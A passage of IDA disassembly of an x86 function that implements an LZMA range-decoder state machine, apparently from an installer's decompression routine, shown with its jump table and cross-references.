push [ebp+74h+var_40]
call sub_405DBB
test eax, eax
mov [ebp+74h+var_8], eax
jz loc_4073F9 ; default
loc_406B38: ; CODE XREF: sub_4069FF+112�j
mov eax, [ebp+74h+var_8]
mov ecx, [ebp+74h+var_74]
mov byte ptr [eax+ecx-1], 0
mov [ebp+74h+var_48], 5
jmp short loc_406B6D
; ---------------------------------------------------------------------------
loc_406B4C: ; CODE XREF: sub_4069FF+39�j
; sub_4069FF+176�j
; DATA XREF: ...
cmp [ebp+74h+var_6C], 0 ; jumptable 00406A38 case 3
jz loc_407383
mov ecx, [ebp+74h+var_70]
mov eax, [ebp+74h+var_C]
movzx ecx, byte ptr [ecx]
dec [ebp+74h+var_6C]
shl eax, 8
or eax, ecx
inc [ebp+74h+var_70]
mov [ebp+74h+var_C], eax
loc_406B6D: ; CODE XREF: sub_4069FF+14B�j
mov eax, [ebp+74h+var_48]
dec [ebp+74h+var_48]
test eax, eax
jnz short loc_406B4C ; jumptable 00406A38 case 3
loc_406B77: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
mov eax, [ebp+74h+var_60] ; jumptable 00406A38 case 2
and eax, [ebp+74h+var_1C]
mov ecx, [ebp+74h+var_38]
shl ecx, 4
add ecx, eax
mov [ebp+74h+var_4C], eax
mov eax, [ebp+74h+var_4]
lea esi, [eax+ecx*2]
mov [ebp+74h+var_84], 6
jmp loc_4071FA
; ---------------------------------------------------------------------------
loc_406B9A: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
xor edx, edx ; jumptable 00406A38 case 6
cmp [ebp+74h+var_40], edx
jnz short loc_406C12
movzx eax, [ebp+74h+var_5C]
mov esi, [ebp+74h+var_60]
and esi, [ebp+74h+var_18]
xor ecx, ecx
mov cl, 8
sub cl, byte ptr [ebp+74h+var_3C]
shr eax, cl
mov ecx, [ebp+74h+var_3C]
shl esi, cl
mov ecx, [ebp+74h+var_4]
add eax, esi
lea eax, [eax+eax*2]
shl eax, 9
cmp [ebp+74h+var_38], 4
lea eax, [eax+ecx+0E6Ch]
mov [ebp+74h+var_58], eax
jge short loc_406BD9
mov [ebp+74h+var_38], edx
jmp short loc_406BE9
; ---------------------------------------------------------------------------
loc_406BD9: ; CODE XREF: sub_4069FF+1D3�j
cmp [ebp+74h+var_38], 0Ah
jge short loc_406BE5
sub [ebp+74h+var_38], 3
jmp short loc_406BE9
; ---------------------------------------------------------------------------
loc_406BE5: ; CODE XREF: sub_4069FF+1DE�j
sub [ebp+74h+var_38], 6
loc_406BE9: ; CODE XREF: sub_4069FF+1D8�j
; sub_4069FF+1E4�j
cmp [ebp+74h+var_34], edx
jz short loc_406C0A
mov eax, [ebp+74h+var_14]
sub eax, [ebp+74h+var_2C]
cmp eax, [ebp+74h+var_74]
jb short loc_406BFC
add eax, [ebp+74h+var_74]
loc_406BFC: ; CODE XREF: sub_4069FF+1F8�j
mov ecx, [ebp+74h+var_8]
mov al, [eax+ecx]
xor ebx, ebx
mov [ebp+74h+var_5B], al
inc ebx
jmp short loc_406C6F
; ---------------------------------------------------------------------------
loc_406C0A: ; CODE XREF: sub_4069FF+1ED�j
xor ebx, ebx
inc ebx
jmp loc_406DE0
; ---------------------------------------------------------------------------
loc_406C12: ; CODE XREF: sub_4069FF+1A0�j
mov eax, [ebp+74h+var_4]
mov ecx, [ebp+74h+var_38]
mov [ebp+74h+var_34], 1
lea esi, [eax+ecx*2+180h]
mov [ebp+74h+var_84], 7
jmp loc_4071FA
; ---------------------------------------------------------------------------
loc_406C32: ; CODE XREF: sub_4069FF+39�j
; sub_4069FF+2E9�j
; DATA XREF: ...
cmp [ebp+74h+var_6C], 0 ; jumptable 00406A38 case 13
jz loc_40738C
mov ecx, [ebp+74h+var_70]
mov eax, [ebp+74h+var_C]
movzx ecx, byte ptr [ecx]
shl [ebp+74h+var_10], 8
dec [ebp+74h+var_6C]
shl eax, 8
or eax, ecx
inc [ebp+74h+var_70]
mov [ebp+74h+var_C], eax
loc_406C57: ; CODE XREF: sub_4069FF+2E3�j
mov eax, [ebp+74h+var_40]
cmp [ebp+74h+var_48], eax
jnz loc_406D12
cmp ebx, 100h
jge loc_406D78
loc_406C6F: ; CODE XREF: sub_4069FF+209�j
movzx eax, [ebp+74h+var_5B]
shl [ebp+74h+var_5B], 1
mov ecx, [ebp+74h+var_58]
shr eax, 7
mov [ebp+74h+var_48], eax
inc eax
shl eax, 8
add eax, ebx
lea esi, [ecx+eax*2]
mov ax, [esi]
mov ecx, [ebp+74h+var_10]
movzx edx, ax
shr ecx, 0Bh
imul ecx, edx
cmp [ebp+74h+var_C], ecx
mov [ebp+74h+var_54], esi
jnb short loc_406CB9
and [ebp+74h+var_40], 0
mov [ebp+74h+var_10], ecx
mov ecx, 800h
sub ecx, edx
sar ecx, 5
add ecx, eax
mov [esi], cx
shl ebx, 1
jmp short loc_406CD8
; ---------------------------------------------------------------------------
loc_406CB9: ; CODE XREF: sub_4069FF+29E�j
sub [ebp+74h+var_10], ecx
sub [ebp+74h+var_C], ecx
xor ecx, ecx
mov cx, ax
shr cx, 5
mov [ebp+74h+var_40], 1
lea ebx, [ebx+ebx+1]
sub eax, ecx
mov [esi], ax
loc_406CD8: ; CODE XREF: sub_4069FF+2B8�j
cmp [ebp+74h+var_10], 1000000h
mov [ebp+74h+var_44], ebx
jnb loc_406C57
jmp loc_406C32 ; jumptable 00406A38 case 13
; ---------------------------------------------------------------------------
loc_406CED: ; CODE XREF: sub_4069FF+39�j
; sub_4069FF+374�j
; DATA XREF: ...
cmp [ebp+74h+var_6C], 0 ; jumptable 00406A38 case 14
jz loc_407395
mov ecx, [ebp+74h+var_70]
mov eax, [ebp+74h+var_C]
movzx ecx, byte ptr [ecx]
shl [ebp+74h+var_10], 8
dec [ebp+74h+var_6C]
shl eax, 8
or eax, ecx
inc [ebp+74h+var_70]
mov [ebp+74h+var_C], eax
loc_406D12: ; CODE XREF: sub_4069FF+25E�j
; sub_4069FF+372�j
cmp ebx, 100h
jge short loc_406D78
mov eax, [ebp+74h+var_58]
mov ecx, [ebp+74h+var_10]
lea edx, [ebx+ebx]
lea esi, [edx+eax]
mov ax, [esi]
movzx edi, ax
shr ecx, 0Bh
imul ecx, edi
cmp [ebp+74h+var_C], ecx
mov [ebp+74h+var_54], esi
jnb short loc_406D50
mov [ebp+74h+var_10], ecx
mov ecx, 800h
sub ecx, edi
sar ecx, 5
add ecx, eax
mov [esi], cx
shl ebx, 1
jmp short loc_406D67
; ---------------------------------------------------------------------------
loc_406D50: ; CODE XREF: sub_4069FF+339�j
sub [ebp+74h+var_10], ecx
sub [ebp+74h+var_C], ecx
xor ecx, ecx
mov cx, ax
shr cx, 5
lea ebx, [edx+1]
sub eax, ecx
mov [esi], ax
loc_406D67: ; CODE XREF: sub_4069FF+34F�j
cmp [ebp+74h+var_10], 1000000h
mov [ebp+74h+var_44], ebx
jnb short loc_406D12
jmp loc_406CED ; jumptable 00406A38 case 14
; ---------------------------------------------------------------------------
loc_406D78: ; CODE XREF: sub_4069FF+26A�j
; sub_4069FF+319�j
and [ebp+74h+var_34], 0
loc_406D7C: ; CODE XREF: sub_4069FF+3DF�j
mov al, byte ptr [ebp+74h+var_44]
mov [ebp+74h+var_5C], al
loc_406D82: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
cmp [ebp+74h+var_64], 0 ; jumptable 00406A38 case 26
jz loc_4073A7
mov al, [ebp+74h+var_5C]
mov ecx, [ebp+74h+var_68]
mov edx, [ebp+74h+var_8]
inc [ebp+74h+var_60]
inc [ebp+74h+var_68]
dec [ebp+74h+var_64]
mov [ecx], al
mov ecx, [ebp+74h+var_14]
mov [ecx+edx], al
lea eax, [ecx+1]
xor edx, edx
div [ebp+74h+var_74]
jmp loc_406F3F
; ---------------------------------------------------------------------------
loc_406DB3: ; CODE XREF: sub_4069FF+39�j
; sub_4069FF+43A�j
; DATA XREF: ...
cmp [ebp+74h+var_6C], 0 ; jumptable 00406A38 case 15
jz loc_40739E
mov ecx, [ebp+74h+var_70]
mov eax, [ebp+74h+var_C]
movzx ecx, byte ptr [ecx]
shl [ebp+74h+var_10], 8
dec [ebp+74h+var_6C]
shl eax, 8
or eax, ecx
inc [ebp+74h+var_70]
mov [ebp+74h+var_C], eax
loc_406DD8: ; CODE XREF: sub_4069FF+438�j
cmp ebx, 100h
jge short loc_406D7C
loc_406DE0: ; CODE XREF: sub_4069FF+20E�j
mov eax, [ebp+74h+var_58]
mov ecx, [ebp+74h+var_10]
lea edx, [ebx+ebx]
lea esi, [edx+eax]
mov ax, [esi]
movzx edi, ax
shr ecx, 0Bh
imul ecx, edi
cmp [ebp+74h+var_C], ecx
mov [ebp+74h+var_54], esi
jnb short loc_406E16
mov [ebp+74h+var_10], ecx
mov ecx, 800h
sub ecx, edi
sar ecx, 5
add ecx, eax
mov [esi], cx
shl ebx, 1
jmp short loc_406E2D
; ---------------------------------------------------------------------------
loc_406E16: ; CODE XREF: sub_4069FF+3FF�j
sub [ebp+74h+var_10], ecx
sub [ebp+74h+var_C], ecx
xor ecx, ecx
mov cx, ax
shr cx, 5
lea ebx, [edx+1]
sub eax, ecx
mov [esi], ax
loc_406E2D: ; CODE XREF: sub_4069FF+415�j
cmp [ebp+74h+var_10], 1000000h
mov [ebp+74h+var_44], ebx
jnb short loc_406DD8
jmp loc_406DB3 ; jumptable 00406A38 case 15
; ---------------------------------------------------------------------------
loc_406E3E: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
cmp [ebp+74h+var_40], 1 ; jumptable 00406A38 case 7
jnz short loc_406E5D
mov eax, [ebp+74h+var_4]
mov ecx, [ebp+74h+var_38]
lea esi, [eax+ecx*2+198h]
mov [ebp+74h+var_84], 8
jmp loc_4071FA
; ---------------------------------------------------------------------------
loc_406E5D: ; CODE XREF: sub_4069FF+443�j
mov eax, [ebp+74h+var_24]
mov [ebp+74h+var_20], eax
mov eax, [ebp+74h+var_28]
mov [ebp+74h+var_24], eax
mov eax, [ebp+74h+var_2C]
mov [ebp+74h+var_28], eax
xor eax, eax
cmp [ebp+74h+var_38], 7
mov [ebp+74h+var_80], 16h
setnl al
dec eax
and eax, 0FFFFFFFDh
add eax, 0Ah
mov [ebp+74h+var_38], eax
mov eax, [ebp+74h+var_4]
add eax, 664h
mov [ebp+74h+var_58], eax
loc_406E94: ; CODE XREF: sub_4069FF+39�j
; sub_4069FF+5A8�j
; DATA XREF: ...
mov esi, [ebp+74h+var_58] ; jumptable 00406A38 case 17
mov [ebp+74h+var_84], 12h
jmp loc_4071FA
; ---------------------------------------------------------------------------
loc_406EA3: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
cmp [ebp+74h+var_40], 0 ; jumptable 00406A38 case 8
jnz short loc_406EC7
mov eax, [ebp+74h+var_38]
mov ecx, [ebp+74h+var_4]
add eax, 0Fh
shl eax, 4
add eax, [ebp+74h+var_4C]
mov [ebp+74h+var_84], 9
lea esi, [ecx+eax*2]
jmp loc_4071FA
; ---------------------------------------------------------------------------
loc_406EC7: ; CODE XREF: sub_4069FF+4A8�j
mov eax, [ebp+74h+var_4]
mov ecx, [ebp+74h+var_38]
lea esi, [eax+ecx*2+1B0h]
mov [ebp+74h+var_84], 0Ah
jmp loc_4071FA
; ---------------------------------------------------------------------------
loc_406EE0: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
cmp [ebp+74h+var_40], 0 ; jumptable 00406A38 case 9
jnz loc_406F95
cmp [ebp+74h+var_60], 0
jz loc_4073F9 ; default
xor eax, eax
cmp [ebp+74h+var_38], 7
setnl al
lea eax, [eax+eax+9]
mov [ebp+74h+var_38], eax
loc_406F04: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
cmp [ebp+74h+var_64], 0 ; jumptable 00406A38 case 27
jz loc_4073B0
mov eax, [ebp+74h+var_14]
sub eax, [ebp+74h+var_2C]
cmp eax, [ebp+74h+var_74]
jb short loc_406F1C
add eax, [ebp+74h+var_74]
loc_406F1C: ; CODE XREF: sub_4069FF+518�j
mov edx, [ebp+74h+var_8]
mov cl, [eax+edx]
mov eax, [ebp+74h+var_14]
mov [eax+edx], cl
inc eax
xor edx, edx
div [ebp+74h+var_74]
inc [ebp+74h+var_60]
mov eax, [ebp+74h+var_68]
inc [ebp+74h+var_68]
dec [ebp+74h+var_64]
mov [ebp+74h+var_5C], cl
mov [eax], cl
loc_406F3F: ; CODE XREF: sub_4069FF+3AF�j
mov [ebp+74h+var_14], edx
loc_406F42: ; CODE XREF: sub_4069FF+7C3�j
mov [ebp+74h+var_88], 2
jmp loc_406A2C
; ---------------------------------------------------------------------------
loc_406F4E: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
cmp [ebp+74h+var_40], 0 ; jumptable 00406A38 case 10
jnz short loc_406F59
mov eax, [ebp+74h+var_28]
jmp short loc_406F8C
; ---------------------------------------------------------------------------
loc_406F59: ; CODE XREF: sub_4069FF+553�j
mov eax, [ebp+74h+var_4]
mov ecx, [ebp+74h+var_38]
lea esi, [eax+ecx*2+1C8h]
mov [ebp+74h+var_84], 0Bh
jmp loc_4071FA
; ---------------------------------------------------------------------------
loc_406F72: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
cmp [ebp+74h+var_40], 0 ; jumptable 00406A38 case 11
jnz short loc_406F7D
mov eax, [ebp+74h+var_24]
jmp short loc_406F86
; ---------------------------------------------------------------------------
loc_406F7D: ; CODE XREF: sub_4069FF+577�j
mov ecx, [ebp+74h+var_24]
mov eax, [ebp+74h+var_20]
mov [ebp+74h+var_20], ecx
loc_406F86: ; CODE XREF: sub_4069FF+57C�j
mov ecx, [ebp+74h+var_28]
mov [ebp+74h+var_24], ecx
loc_406F8C: ; CODE XREF: sub_4069FF+558�j
mov ecx, [ebp+74h+var_2C]
mov [ebp+74h+var_28], ecx
mov [ebp+74h+var_2C], eax
loc_406F95: ; CODE XREF: sub_4069FF+4E5�j
mov eax, [ebp+74h+var_4]
add eax, 0A68h
mov [ebp+74h+var_58], eax
mov [ebp+74h+var_80], 15h
jmp loc_406E94 ; jumptable 00406A38 case 17
; ---------------------------------------------------------------------------
loc_406FAC: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
xor eax, eax ; jumptable 00406A38 case 21
cmp [ebp+74h+var_38], 7
setnl al
dec eax
and eax, 0FFFFFFFDh
add eax, 0Bh
mov [ebp+74h+var_38], eax
jmp loc_407160
; ---------------------------------------------------------------------------
loc_406FC4: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
mov eax, [ebp+74h+var_30] ; jumptable 00406A38 case 22
cmp eax, 4
jl short loc_406FCF
push 3
pop eax
loc_406FCF: ; CODE XREF: sub_4069FF+5CB�j
mov ecx, [ebp+74h+var_4]
shl eax, 7
lea eax, [eax+ecx+360h]
mov [ebp+74h+var_58], eax
mov [ebp+74h+var_40], 6
mov [ebp+74h+var_7C], 19h
jmp loc_4072BB ; jumptable 00406A38 case 23
; ---------------------------------------------------------------------------
loc_406FF2: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
cmp ebx, 4 ; jumptable 00406A38 case 25
jl short loc_40702C
mov ecx, ebx
mov eax, ebx
and eax, 1
sar ecx, 1
dec ecx
or eax, 2
shl eax, cl
cmp ebx, 0Eh
mov [ebp+74h+var_2C], eax
jge short loc_407022
mov edx, [ebp+74h+var_4]
sub eax, ebx
lea eax, [edx+eax*2+55Eh]
mov [ebp+74h+var_40], ecx
jmp loc_4070A3
; ---------------------------------------------------------------------------
loc_407022: ; CODE XREF: sub_4069FF+60D�j
xor ebx, ebx
add ecx, 0FFFFFFFCh
mov [ebp+74h+var_48], ecx
jmp short loc_40705F
; ---------------------------------------------------------------------------
loc_40702C: ; CODE XREF: sub_4069FF+5F6�j
mov [ebp+74h+var_2C], ebx
jmp loc_40715D
; ---------------------------------------------------------------------------
loc_407034: ; CODE XREF: sub_4069FF+39�j
; sub_4069FF+68B�j
; DATA XREF: ...
cmp [ebp+74h+var_6C], 0 ; jumptable 00406A38 case 12
jz loc_4073B9
mov ecx, [ebp+74h+var_70]
mov eax, [ebp+74h+var_C]
movzx ecx, byte ptr [ecx]
shl [ebp+74h+var_10], 8
dec [ebp+74h+var_6C]
shl eax, 8
or eax, ecx
inc [ebp+74h+var_70]
mov [ebp+74h+var_C], eax
mov eax, [ebp+74h+var_2C]
loc_40705C: ; CODE XREF: sub_4069FF+689�j
dec [ebp+74h+var_48]
loc_40705F: ; CODE XREF: sub_4069FF+62B�j
cmp [ebp+74h+var_48], 0
jle short loc_40708C
mov ecx, [ebp+74h+var_C]
shr [ebp+74h+var_10], 1
shl ebx, 1
cmp ecx, [ebp+74h+var_10]
mov [ebp+74h+var_44], ebx
jb short loc_407081
mov ecx, [ebp+74h+var_10]
sub [ebp+74h+var_C], ecx
or ebx, 1
mov [ebp+74h+var_44], ebx
loc_407081: ; CODE XREF: sub_4069FF+674�j
cmp [ebp+74h+var_10], 1000000h
jnb short loc_40705C
jmp short loc_407034 ; jumptable 00406A38 case 12
; ---------------------------------------------------------------------------
loc_40708C: ; CODE XREF: sub_4069FF+664�j
shl ebx, 4
add eax, ebx
mov [ebp+74h+var_2C], eax
mov eax, [ebp+74h+var_4]
add eax, 644h
mov [ebp+74h+var_40], 4
loc_4070A3: ; CODE XREF: sub_4069FF+61E�j
xor ebx, ebx
mov [ebp+74h+var_58], eax
mov [ebp+74h+var_50], 1
mov [ebp+74h+var_44], ebx
mov [ebp+74h+var_48], ebx
jmp short loc_4070DF
; ---------------------------------------------------------------------------
loc_4070B7: ; CODE XREF: sub_4069FF+39�j
; sub_4069FF+756�j
; DATA XREF: ...
cmp [ebp+74h+var_6C], 0 ; jumptable 00406A38 case 16
jz loc_4073C2
mov ecx, [ebp+74h+var_70]
mov eax, [ebp+74h+var_C]
movzx ecx, byte ptr [ecx]
shl [ebp+74h+var_10], 8
dec [ebp+74h+var_6C]
shl eax, 8
or eax, ecx
inc [ebp+74h+var_70]
mov [ebp+74h+var_C], eax
loc_4070DC: ; CODE XREF: sub_4069FF+754�j
inc [ebp+74h+var_48]
loc_4070DF: ; CODE XREF: sub_4069FF+6B6�j
mov eax, [ebp+74h+var_40]
cmp [ebp+74h+var_48], eax
jge short loc_40715A
mov edi, [ebp+74h+var_50]
mov eax, [ebp+74h+var_58]
mov edx, [ebp+74h+var_10]
add edi, edi
lea esi, [edi+eax]
mov ax, [esi]
movzx ecx, ax
shr edx, 0Bh
imul edx, ecx
cmp [ebp+74h+var_C], edx
mov [ebp+74h+var_54], esi
jnb short loc_407120
mov [ebp+74h+var_10], edx
mov edx, 800h
sub edx, ecx
sar edx, 5
add edx, eax
shl [ebp+74h+var_50], 1
mov [esi], dx
jmp short loc_40714C
; ---------------------------------------------------------------------------
loc_407120: ; CODE XREF: sub_4069FF+708�j
xor ecx, ecx
inc ecx
sub [ebp+74h+var_10], edx
sub [ebp+74h+var_C], edx
mov ebx, ecx
mov ecx, [ebp+74h+var_48]
shl ebx, cl
mov ecx, ebx
mov ebx, [ebp+74h+var_44]
or ebx, ecx
xor ecx, ecx
mov cx, ax
shr cx, 5
mov [ebp+74h+var_44], ebx
sub eax, ecx
inc edi
mov [esi], ax
mov [ebp+74h+var_50], edi
loc_40714C: ; CODE XREF: sub_4069FF+71F�j
cmp [ebp+74h+var_10], 1000000h
jnb short loc_4070DC
jmp loc_4070B7 ; jumptable 00406A38 case 16
; ---------------------------------------------------------------------------
loc_40715A: ; CODE XREF: sub_4069FF+6E6�j
add [ebp+74h+var_2C], ebx
loc_40715D: ; CODE XREF: sub_4069FF+630�j
inc [ebp+74h+var_2C]
loc_407160: ; CODE XREF: sub_4069FF+5C0�j
mov eax, [ebp+74h+var_2C]
test eax, eax
jz loc_4073CB
cmp eax, [ebp+74h+var_60]
ja loc_4073F9 ; default
add [ebp+74h+var_30], 2
mov eax, [ebp+74h+var_30]
add [ebp+74h+var_60], eax
loc_40717E: ; CODE XREF: sub_4069FF+39�j
; sub_4069FF+7C1�j
; DATA XREF: ...
cmp [ebp+74h+var_64], 0 ; jumptable 00406A38 case 28
jz loc_4073D1
mov eax, [ebp+74h+var_14]
sub eax, [ebp+74h+var_2C]
cmp eax, [ebp+74h+var_74]
jb short loc_407196
add eax, [ebp+74h+var_74]
loc_407196: ; CODE XREF: sub_4069FF+792�j
mov edx, [ebp+74h+var_8]
mov cl, [eax+edx]
mov eax, [ebp+74h+var_14]
mov [eax+edx], cl
inc eax
xor edx, edx
div [ebp+74h+var_74]
mov eax, [ebp+74h+var_68]
inc [ebp+74h+var_68]
dec [ebp+74h+var_64]
dec [ebp+74h+var_30]
cmp [ebp+74h+var_30], 0
mov [ebp+74h+var_5C], cl
mov [eax], cl
mov [ebp+74h+var_14], edx
jg short loc_40717E ; jumptable 00406A38 case 28
jmp loc_406F42
; ---------------------------------------------------------------------------
loc_4071C7: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
cmp [ebp+74h+var_40], 0 ; jumptable 00406A38 case 18
jnz short loc_4071ED
mov eax, [ebp+74h+var_4C]
and [ebp+74h+var_30], 0
mov ecx, [ebp+74h+var_58]
shl eax, 4
lea eax, [ecx+eax+4]
loc_4071DE: ; CODE XREF: sub_4069FF+89B�j
mov [ebp+74h+var_58], eax
mov [ebp+74h+var_40], 3
jmp loc_4072B4
; ---------------------------------------------------------------------------
loc_4071ED: ; CODE XREF: sub_4069FF+7CC�j
mov esi, [ebp+74h+var_58]
add esi, 2
mov [ebp+74h+var_84], 13h
loc_4071FA: ; CODE XREF: sub_4069FF+196�j
; sub_4069FF+22E�j ...
mov [ebp+74h+var_54], esi
loc_4071FD: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
mov ax, [esi] ; jumptable 00406A38 case 4
mov ecx, [ebp+74h+var_10]
movzx edx, ax
shr ecx, 0Bh
imul ecx, edx
cmp [ebp+74h+var_C], ecx
jnb short loc_407229
mov [ebp+74h+var_10], ecx
mov ecx, 800h
sub ecx, edx
sar ecx, 5
add ecx, eax
and [ebp+74h+var_40], 0
mov [esi], cx
jmp short loc_407244
; ---------------------------------------------------------------------------
loc_407229: ; CODE XREF: sub_4069FF+810�j
sub [ebp+74h+var_10], ecx
sub [ebp+74h+var_C], ecx
xor ecx, ecx
mov cx, ax
shr cx, 5
mov [ebp+74h+var_40], 1
sub eax, ecx
mov [esi], ax
loc_407244: ; CODE XREF: sub_4069FF+828�j
cmp [ebp+74h+var_10], 1000000h
jnb short loc_407272
loc_40724D: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
cmp [ebp+74h+var_6C], 0 ; jumptable 00406A38 case 5
jz loc_4073DA
mov ecx, [ebp+74h+var_70]
mov eax, [ebp+74h+var_C]
movzx ecx, byte ptr [ecx]
shl [ebp+74h+var_10], 8
dec [ebp+74h+var_6C]
shl eax, 8
or eax, ecx
inc [ebp+74h+var_70]
mov [ebp+74h+var_C], eax
loc_407272: ; CODE XREF: sub_4069FF+84C�j
mov eax, [ebp+74h+var_84]
loc_407275: ; CODE XREF: sub_4069FF+96B�j
; sub_4069FF+976�j
mov [ebp+74h+var_88], eax
jmp loc_406A2C
; ---------------------------------------------------------------------------
loc_40727D: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
cmp [ebp+74h+var_40], 0 ; jumptable 00406A38 case 19
jnz short loc_40729F
mov eax, [ebp+74h+var_4C]
mov ecx, [ebp+74h+var_58]
shl eax, 4
mov [ebp+74h+var_30], 8
lea eax, [ecx+eax+104h]
jmp loc_4071DE
; ---------------------------------------------------------------------------
loc_40729F: ; CODE XREF: sub_4069FF+882�j
add [ebp+74h+var_58], 204h
mov [ebp+74h+var_30], 10h
mov [ebp+74h+var_40], 8
loc_4072B4: ; CODE XREF: sub_4069FF+7E9�j
mov [ebp+74h+var_7C], 14h
loc_4072BB: ; CODE XREF: sub_4069FF+39�j
; sub_4069FF+5EE�j
; DATA XREF: ...
mov eax, [ebp+74h+var_40] ; jumptable 00406A38 case 23
mov [ebp+74h+var_50], 1
mov [ebp+74h+var_48], eax
jmp short loc_4072F2
; ---------------------------------------------------------------------------
loc_4072CA: ; CODE XREF: sub_4069FF+39�j
; sub_4069FF+953�j
; DATA XREF: ...
cmp [ebp+74h+var_6C], 0 ; jumptable 00406A38 case 24
jz loc_4073E3
mov ecx, [ebp+74h+var_70]
mov eax, [ebp+74h+var_C]
movzx ecx, byte ptr [ecx]
shl [ebp+74h+var_10], 8
dec [ebp+74h+var_6C]
shl eax, 8
or eax, ecx
inc [ebp+74h+var_70]
mov [ebp+74h+var_C], eax
loc_4072EF: ; CODE XREF: sub_4069FF+951�j
dec [ebp+74h+var_48]
loc_4072F2: ; CODE XREF: sub_4069FF+8C9�j
cmp [ebp+74h+var_48], 0
jle short loc_407357
mov edx, [ebp+74h+var_50]
mov eax, [ebp+74h+var_58]
mov ecx, [ebp+74h+var_10]
add edx, edx
lea esi, [edx+eax]
mov ax, [esi]
movzx edi, ax
shr ecx, 0Bh
imul ecx, edi
cmp [ebp+74h+var_C], ecx
mov [ebp+74h+var_54], esi
jnb short loc_407331
mov [ebp+74h+var_10], ecx
mov ecx, 800h
sub ecx, edi
sar ecx, 5
add ecx, eax
shl [ebp+74h+var_50], 1
mov [esi], cx
jmp short loc_407349
; ---------------------------------------------------------------------------
loc_407331: ; CODE XREF: sub_4069FF+919�j
sub [ebp+74h+var_10], ecx
sub [ebp+74h+var_C], ecx
xor ecx, ecx
mov cx, ax
shr cx, 5
sub eax, ecx
inc edx
mov [esi], ax
mov [ebp+74h+var_50], edx
loc_407349: ; CODE XREF: sub_4069FF+930�j
cmp [ebp+74h+var_10], 1000000h
jnb short loc_4072EF
jmp loc_4072CA ; jumptable 00406A38 case 24
; ---------------------------------------------------------------------------
loc_407357: ; CODE XREF: sub_4069FF+8F7�j
mov ecx, [ebp+74h+var_40]
mov ebx, [ebp+74h+var_50]
xor eax, eax
inc eax
shl eax, cl
sub ebx, eax
mov eax, [ebp+74h+var_7C]
mov [ebp+74h+var_44], ebx
jmp loc_407275
; ---------------------------------------------------------------------------
loc_40736F: ; CODE XREF: sub_4069FF+39�j
; DATA XREF: .text:off_407404�o
add [ebp+74h+var_30], ebx ; jumptable 00406A38 case 20
mov eax, [ebp+74h+var_80]
jmp loc_407275
; ---------------------------------------------------------------------------
loc_40737A: ; CODE XREF: sub_4069FF+E6�j
mov [ebp+74h+var_88], 1
jmp short loc_4073EA
; ---------------------------------------------------------------------------
loc_407383: ; CODE XREF: sub_4069FF+151�j
mov [ebp+74h+var_88], 3
jmp short loc_4073EA
; ---------------------------------------------------------------------------
loc_40738C: ; CODE XREF: sub_4069FF+237�j
mov [ebp+74h+var_88], 0Dh
jmp short loc_4073EA
; ---------------------------------------------------------------------------
loc_407395: ; CODE XREF: sub_4069FF+2F2�j
mov [ebp+74h+var_88], 0Eh
jmp short loc_4073EA
; ---------------------------------------------------------------------------
loc_40739E: ; CODE XREF: sub_4069FF+3B8�j
mov [ebp+74h+var_88], 0Fh
jmp short loc_4073EA
; ---------------------------------------------------------------------------
loc_4073A7: ; CODE XREF: sub_4069FF+387�j
mov [ebp+74h+var_88], 1Ah
jmp short loc_4073EA
; ---------------------------------------------------------------------------
loc_4073B0: ; CODE XREF: sub_4069FF+509�j
mov [ebp+74h+var_88], 1Bh
jmp short loc_4073EA
; ---------------------------------------------------------------------------
loc_4073B9: ; CODE XREF: sub_4069FF+639�j
mov [ebp+74h+var_88], 0Ch
jmp short loc_4073EA
; ---------------------------------------------------------------------------
loc_4073C2: ; CODE XREF: sub_4069FF+6BC�j
mov [ebp+74h+var_88], 10h
jmp short loc_4073EA
; ---------------------------------------------------------------------------
loc_4073CB: ; CODE XREF: sub_4069FF+766�j
or [ebp+74h+var_30], 0FFFFFFFFh
jmp short loc_4073EA
; ---------------------------------------------------------------------------
loc_4073D1: ; CODE XREF: sub_4069FF+783�j
mov [ebp+74h+var_88], 1Ch
jmp short loc_4073EA
; ---------------------------------------------------------------------------
loc_4073DA: ; CODE XREF: sub_4069FF+852�j
mov [ebp+74h+var_88], 5
jmp short loc_4073EA
; ---------------------------------------------------------------------------
loc_4073E3: ; CODE XREF: sub_4069FF+8CF�j
mov [ebp+74h+var_88], 18h
loc_4073EA: ; CODE XREF: sub_4069FF+44�j
; sub_4069FF+982�j ...
mov edi, [ebp+74h+arg_0]
push 22h
pop ecx
lea esi, [ebp+74h+var_88]
rep movsd
xor eax, eax
jmp short loc_4073FC
; ---------------------------------------------------------------------------
loc_4073F9: ; CODE XREF: sub_4069FF+33�j
; sub_4069FF+57�j ...
or eax, 0FFFFFFFFh ; default
loc_4073FC: ; CODE XREF: sub_4069FF+9F8�j
pop ebx
loc_4073FD: ; CODE XREF: sub_4069FF+21�j
pop edi
pop esi
add ebp, 74h
leave
retn
sub_4069FF endp
; ---------------------------------------------------------------------------
off_407404 dd offset loc_406A3F ; DATA XREF: sub_4069FF+39�r
dd offset loc_406AE1 ; jump table for switch statement
dd offset loc_406B77
dd offset loc_406B4C
dd offset loc_4071FD
dd offset loc_40724D
dd offset loc_406B9A
dd offset loc_406E3E
dd offset loc_406EA3
dd offset loc_406EE0
dd offset loc_406F4E
dd offset loc_406F72
dd offset loc_407034
dd offset loc_406C32
dd offset loc_406CED
dd offset loc_406DB3
dd offset loc_4070B7
dd offset loc_406E94
dd offset loc_4071C7
dd offset loc_40727D
dd offset loc_40736F
dd offset loc_406FAC
dd offset loc_406FC4
dd offset loc_4072BB
